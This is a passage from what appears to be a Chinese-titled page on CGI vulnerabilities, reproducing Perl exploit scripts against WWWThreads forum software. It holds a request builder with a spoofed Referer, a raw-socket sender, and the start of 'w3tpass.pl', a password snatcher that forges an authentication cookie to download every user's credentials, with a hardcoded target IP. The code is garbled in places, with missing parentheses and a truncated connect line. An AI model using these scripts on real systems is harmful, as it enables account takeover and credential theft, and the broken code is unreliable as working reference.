|
CGI漏洞(29) "&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off"; $tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n"; print sendraw($tosend); sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) die("inet_aton problems";
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp‘)0)
die("Socket problems\n";
if(connect(S,pack "SnA4x8",2,80,$tar select(STDOUT); close(S);
return @in;
} else { die("Can‘t connect...\n"; }}
-[ w3tpass.pl #!/usr/bin/perl
# download all wwwthread usernames/passwords once you‘re administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket; #####################################################
# modify these # can be DNS or IP address
$ip="209.143.242.119"; $username="rfp";
# remember to put a ‘\‘ before the ‘$‘ characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv"; ##################################################### @letts=split(//,‘0ABCDEFGHIJKLMNOPQRSTUVWXYZ‘);
print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists..."; foreach $let (@letts){
| 
